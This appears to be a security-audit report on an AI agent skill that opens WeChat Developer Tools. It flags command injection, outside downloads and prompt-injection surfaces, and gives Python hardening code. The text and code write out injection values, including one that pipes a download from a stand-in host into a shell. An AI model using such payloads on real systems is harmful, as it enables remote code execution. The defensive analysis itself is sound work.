NYC

miniprogram-development

Audit result: Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGH
Findings: COMMAND_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): The skill instructs the agent to open WeChat Developer Tools by running a local command, cli.bat on Windows or the cli binary on macOS, with the project root supplied through a placeholder argument (--project "项目根目录路径", i.e. "project root directory path"). Nothing constrains what replaces the placeholder. If the path is interpolated into a shell command string and an attacker controls it (for example a value such as "; malicious_command #" taken from user input or a configuration file), the shell would run the injected command on the host machine with the agent's privileges.
  • [EXTERNAL_DOWNLOADS] (LOW): The skill directs the agent to use downloadRemoteFile to fetch assets from https://img.icons8.com. While this serves a functional purpose, it involves downloading content from an external, non-whitelisted domain into the local project environment.
  • [INDIRECT_PROMPT_INJECTION] (LOW): The skill exposes a surface where untrusted data (user input, configuration files, downloaded assets) is processed without any trust boundary:
      • Ingestion points: userInput passed to AI models, fields of project.config.json, and externally downloaded icons.
      • Boundary markers: none detected in the instructions or code snippets.
      • Capability inventory: execution of local CLI binaries, file writing, and downloadRemoteFile network operations.
      • Sanitization: no evidence of input validation or path sanitization before strings are passed to shell commands or to the AI model.
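The COMMAND_EXECUTION finding and the missing-sanitization note above describe the same defect from two sides: a project path that reaches a shell string unchecked. The block below is an added example, not code from the skill or from Gen Agent Trust Hub. It shows the interpolation pattern the audit flags next to a hardened launcher that validates the path and passes it as a single argv element, plus a host allow-list check of the kind the EXTERNAL_DOWNLOADS finding implies for downloadRemoteFile. The `open` subcommand, the default install locations of cli.bat and the cli binary, the `WECHAT_DEVTOOLS_CLI` override, and the `/tmp/...` sample paths are assumptions made for the example.

```python
import os
import re
import subprocess
import sys
from urllib.parse import urlparse

# Characters that change the meaning of a command line if a path is
# interpolated into a shell string (sh/bash and cmd.exe between them).
# Backslash and parentheses are deliberately allowed so ordinary Windows
# paths such as "C:\Program Files (x86)\..." are not rejected.
SHELL_METACHARS = re.compile("[;&|`$<>\"'%^\n\r]")

# Hosts the skill may fetch assets from. The audit names img.icons8.com;
# an explicit allow-list like this is an assumption, not the skill's code.
ALLOWED_DOWNLOAD_HOSTS = frozenset({"img.icons8.com"})


def cli_executable() -> str:
    """Location of the WeChat DevTools CLI. The default paths below are
    assumptions; set WECHAT_DEVTOOLS_CLI to the real location."""
    override = os.environ.get("WECHAT_DEVTOOLS_CLI")
    if override:
        return override
    if sys.platform.startswith("win"):
        return r"C:\Program Files (x86)\Tencent\WeChat DevTools\cli.bat"
    return "/Applications/wechatwebdevtools.app/Contents/MacOS/cli"


def validate_project_path(path: str, must_exist: bool = True) -> str:
    """Return an absolute, normalised project root or raise ValueError.
    Rejects NUL bytes and shell metacharacters so the value stays safe even
    if a later caller carelessly builds a shell string from it."""
    if not path or "\x00" in path:
        raise ValueError("empty path or NUL byte in project path")
    if SHELL_METACHARS.search(path):
        raise ValueError(f"shell metacharacters in project path: {path!r}")
    abs_path = os.path.abspath(path)
    if must_exist and not os.path.isdir(abs_path):
        raise ValueError(f"project root is not a directory: {abs_path}")
    return abs_path


def is_safe_project_path(path: str, must_exist: bool = True) -> bool:
    """Boolean wrapper around validate_project_path for callers and tests."""
    try:
        validate_project_path(path, must_exist)
        return True
    except ValueError:
        return False


def unsafe_open_command(project_path: str) -> str:
    """The pattern the audit flags: the path is interpolated into a shell
    string. With project_path = '/tmp/x"; curl evil.example | sh #' a shell
    closes the quoted --project argument and runs the injected command."""
    return f'{cli_executable()} open --project "{project_path}"'


def safe_open_argv(project_path: str, must_exist: bool = True) -> list:
    """Hardened form: validate the path and hand it to the CLI as one argv
    element, so no shell ever parses it."""
    return [cli_executable(), "open", "--project",
            validate_project_path(project_path, must_exist)]


def open_devtools(project_path: str) -> int:
    """Launch DevTools on the project. shell=False sends argv straight to the
    executable; returns the CLI's exit code."""
    return subprocess.run(safe_open_argv(project_path), shell=False,
                          check=False).returncode


def is_allowed_download(url: str) -> bool:
    """Allow-list check for downloadRemoteFile targets: HTTPS only, no embedded
    credentials, exact host match (img.icons8.com.attacker.example fails)."""
    parsed = urlparse(url)
    return (parsed.scheme == "https"
            and parsed.username is None
            and parsed.password is None
            and parsed.hostname in ALLOWED_DOWNLOAD_HOSTS)


if __name__ == "__main__":
    # Constructed inputs: an injection attempt and a benign project root.
    print(unsafe_open_command('/tmp/x"; curl evil.example | sh #'))
    print(safe_open_argv("/tmp/proj", must_exist=False))
```

The argv form is the actual fix; the metacharacter filter is defence in depth for the case where a future edit reintroduces a shell string. The host check compares `parsed.hostname` exactly, so suffix tricks and `user@host` confusion both fail closed.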
Recommendations
  • AI detected serious security threats
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Feb 17, 2026, 04:45 PM